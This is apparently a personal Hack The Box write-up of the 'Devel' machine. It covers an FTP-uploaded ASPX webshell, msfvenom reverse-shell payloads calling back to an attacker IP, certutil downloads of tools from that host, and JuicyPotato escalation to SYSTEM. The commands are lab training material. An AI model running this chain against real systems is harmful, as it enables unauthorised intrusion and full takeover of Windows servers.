Devel

Personal Rating: Medium

Enumeration

sudo nmap -sV -sC <IP>

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM       <DIR>          aspnet_client
| 03-17-17  04:37PM                  689 iisstart.htm
|_03-17-17  04:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7

The anonymous FTP root contains iisstart.htm, welcome.png and aspnet_client, the default content of an IIS 7 site, so the FTP directory looks like the web root of the IIS server on port 80.

If I can write files here, I can place an ASPX webshell via FTP and then execute it by requesting it over HTTP.

As seen here, this works: a file uploaded with the ftp put command is served by IIS.

Shell Access

Generating a web shell payload:

msfvenom -p windows/shell/reverse_tcp LHOST=10.10.16.6 LPORT=4444 -f aspx > shell.aspx

I received a connection, but it dies when I give a command and shows no output.

This is the expected behaviour of a staged payload (windows/shell/reverse_tcp, with a slash) caught by a plain netcat listener: the first connection only asks the handler for the second stage, which netcat cannot deliver, so the session dies. A staged payload needs a Metasploit multi/handler; the stageless windows/shell_reverse_tcp (with an underscore) ships the complete shell inside the payload and works fine with netcat.

I placed antak.aspx (the ASPX webshell from Nishang) on the host with the same ftp put method. This worked, so I will create a shell from here.

Internal Enumeration

PS> whoami

iis apppool\web

The shell runs as the IIS application pool identity iis apppool\web rather than as a regular user. Got the user babis: the user flag belongs to the local account babis.

I ran systeminfo on the host and saved the output to a file, then ran wesng (Windows Exploit Suggester NG) over it to check for missing patches. The system appears to be an unpatched Windows 7, so there should be plenty.

Perfect, this worked for transferring files to the host:

certutil.exe -urlcache -f http://10.10.16.6:8000/winPEASx86.exe C:\Users\Public\winpeasx86.exe

Let's see if this works:

cmd /c C:\Users\Public\winpeasx86.exe > C:\Users\Public\peasout.txt

I could get a proper reverse shell by creating this payload (stageless this time, windows/shell_reverse_tcp with an underscore) and uploading it with certutil:

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe

The application pool identity holds privileges that allow for privesc regardless of missing patches. The important one is SeImpersonatePrivilege, which is Enabled (SeAssignPrimaryTokenPrivilege is held too, but Disabled); these are the privileges the Potato family of exploits abuses. Output of whoami /priv:

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled
It seems like I cannot really use winPEAS, as I do not get any output.

Privilege Escalation

Doing more research on the wesng output (critical findings only):

python3 wes.py /HTBfolder/Boxes/HTB-Devel/systeminfo.txt -s critical > /HTBfolder/Boxes/HTB-Devel/wes-output.txt

This did not work: http://www.exploit-db.com/exploits/15609/

Next candidate: CVE-2010-0232 (MS10-015, KiTrap0D). I found this resource:

I found the exploit with searchsploit and it looks promising:

searchsploit kitrap

Microsoft Windows NT/2000/2003/2008/XP/Vista/7 - 'KiTrap0D' User Mode to Ring Escalation (MS10-015) | windows/local/11199.txt

Shellcodes: No Results

searchsploit -p 11199

Exploit: Microsoft Windows NT/2000/2003/2008/XP/Vista/7 - 'KiTrap0D' User Mode to Ring Escalation (MS10-015)
URL: https://www.exploit-db.com/exploits/11199
Path: /usr/share/exploitdb/exploits/windows/local/11199.txt
Codes: CVE-2010-0232, OSVDB-61854, MS10-015
Verified: True
File Type: assembler source, ASCII text

kate /usr/share/exploitdb/exploits/windows/local/11199.txt

The entry is a text file rather than a ready-built binary, so it would take some work to turn into something that runs on the target.

Actually, screw this, I want to try JuicyPotato again as it is basic and common, and the token already has SeImpersonatePrivilege enabled. We need the x86 build in this case, since everything run on this box so far (the shell and winPEAS) has been the 32-bit version.

Generating a new shell:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.6 LPORT=7777 -f exe > privshell-x86.exe

Getting the exploit:

Transferring the exploit (both downloads are run from C:\Users\Public, so the relative filenames match the absolute path used in the JuicyPotato command below):

certutil.exe -urlcache -f http://10.10.16.6:8000/Juicy.Potato.x86.exe juicypotato.exe

Transferring the shell:

certutil.exe -urlcache -f http://10.10.16.6:8000/privshell-x86.exe privshell.exe

Exploitation (-p is the program to launch with the stolen token, -l the local port for the COM server, -t * tries both CreateProcessWithTokenW and CreateProcessAsUser, -c the CLSID of the COM server to abuse, here BITS):

juicypotato.exe -p C:\Users\Public\privshell.exe -l 1337 -t * -c {4991d34b-80a1-4291-83b6-3328366b9097}

With a netcat listener open on my host on port 7777 (matching the payload), this worked and the new shell runs with the SYSTEM token.

If it had not worked, I would have tried some other CLSIDs; there are lists online per Windows version and tools to enumerate them on the target itself.
